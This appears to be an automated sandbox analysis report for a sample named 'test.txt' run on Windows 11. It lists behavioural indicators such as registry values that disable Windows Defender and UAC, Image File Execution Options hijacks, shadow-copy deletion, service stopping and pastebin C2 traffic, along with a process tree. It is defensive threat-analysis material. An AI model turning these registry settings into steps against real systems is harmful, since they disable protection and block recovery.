Resubmissions
21-02-2025 21:12
250221-z2l6lazpav 1021-02-2025 19:57
250221-yphrzayrbk 1021-02-2025 19:34
250221-yag7wsyncm 721-02-2025 18:54
250221-xkezvaxmbw 1021-02-2025 18:38
250221-xaa8xaxphn 1021-02-2025 16:33
250221-t2tmsawjer 1021-02-2025 16:20
250221-ttcdjavmfz 10Analysis
-
max time kernel
477s -
max time network
473s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
18-02-2025 16:21
Static task
static1
Behavioral task
behavioral1
Sample
test.txt
Resource
win11-20250217-en
General
-
Target
test.txt
-
Size
18B
-
MD5
5b3f97d48c8751bd031b7ea53545bdb6
-
SHA1
88be3374c62f23406ec83bb11279f8423bd3f88d
-
SHA256
d8fce9dd9c65ca143343f7711859a7cffc3c5e656a8b84108183fb769a12ed8b
-
SHA512
ed2de1eec50310ced4bde8ef6ae4b7902920b007df7b6aeb200cfe9fcc0d36ef05af7526c4675be2feac52831668798d5fe3523175efad6f6549b30f30a0b5d6
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" reg.exe -
UAC bypass 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies boot configuration data using bcdedit 1 TTPs 25 IoCs
pid Process 2736 bcdedit.exe 2920 bcdedit.exe 3788 bcdedit.exe 716 bcdedit.exe 1632 bcdedit.exe 736 bcdedit.exe 4964 bcdedit.exe 3088 bcdedit.exe 3876 bcdedit.exe 2136 bcdedit.exe 1472 bcdedit.exe 1552 bcdedit.exe 4016 bcdedit.exe 1040 bcdedit.exe 2212 bcdedit.exe 3136 bcdedit.exe 1668 bcdedit.exe 736 bcdedit.exe 4964 bcdedit.exe 3708 bcdedit.exe 3188 bcdedit.exe 4492 bcdedit.exe 1668 bcdedit.exe 3876 bcdedit.exe 3380 bcdedit.exe -
Blocks application from running via registry modification 1 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" reg.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-112184765-1670301065-1210615588-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\Windows\\System32\\svchost.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger = "cmd.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "cmd.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\Windows\\System32\\svchost.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger = "cmd.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "cmd.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "cmd.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "cmd.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe reg.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 3068 net.exe 432 net1.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 8 netsh.exe -
Stops running service(s) 4 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 2 pastebin.com 20 pastebin.com 21 pastebin.com -
Power Settings 1 TTPs 1 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3676 msedge.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1984 sc.exe 4916 sc.exe 3088 sc.exe 1852 sc.exe 2796 sc.exe 2200 sc.exe 2352 sc.exe 2560 sc.exe 716 sc.exe 1360 sc.exe 2184 sc.exe 2820 sc.exe 4820 sc.exe 3336 sc.exe 2760 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CentralProcessor\0 chrome.exe -
Enumerates system info in registry 2 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Interacts with shadow copies 3 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2044 vssadmin.exe 3188 vssadmin.exe 332 vssadmin.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-112184765-1670301065-1210615588-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-112184765-1670301065-1210615588-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-112184765-1670301065-1210615588-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-112184765-1670301065-1210615588-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-112184765-1670301065-1210615588-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 3108 NOTEPAD.EXE 2428 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 2248 chrome.exe 2248 chrome.exe 716 powershell.exe 716 powershell.exe 716 powershell.exe 3276 chrome.exe 3276 chrome.exe 3276 chrome.exe 3276 chrome.exe 1660 msedge.exe 1660 msedge.exe 1508 msedge.exe 1508 msedge.exe 4500 msedge.exe 4500 msedge.exe 948 msedge.exe 948 msedge.exe 5244 powershell.exe 5244 powershell.exe 5244 powershell.exe 1040 msedge.exe 1040 msedge.exe 2452 msedge.exe 2452 msedge.exe 5356 msedge.exe 5356 msedge.exe 3676 msedge.exe 3676 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5404 msinfo32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
pid Process 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 2452 msedge.exe 2452 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe Token: SeShutdownPrivilege 2248 chrome.exe Token: SeCreatePagefilePrivilege 2248 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 952 WindowsTerminal.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe -
Suspicious use of SendNotifyMessage 60 IoCs
pid Process 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 2248 chrome.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 1508 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 2452 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 952 WindowsTerminal.exe 6092 WindowsTerminal.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2356 wrote to memory of 3108 2356 cmd.exe 78 PID 2356 wrote to memory of 3108 2356 cmd.exe 78 PID 2248 wrote to memory of 4932 2248 chrome.exe 82 PID 2248 wrote to memory of 4932 2248 chrome.exe 82 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4432 2248 chrome.exe 83 PID 2248 wrote to memory of 4116 2248 chrome.exe 84 PID 2248 wrote to memory of 4116 2248 chrome.exe 84 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 PID 2248 wrote to memory of 4696 2248 chrome.exe 85 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\test.txt1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\test.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ff82cf0cc40,0x7ff82cf0cc4c,0x7ff82cf0cc582⤵PID:4932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1772,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1744 /prefetch:22⤵PID:4432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2036,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2132 /prefetch:32⤵PID:4116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1356,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2204 /prefetch:82⤵PID:4696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:12⤵PID:2196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3284 /prefetch:12⤵PID:1340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3552,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4336 /prefetch:12⤵PID:5096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4592,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4572 /prefetch:82⤵PID:1136
-
-
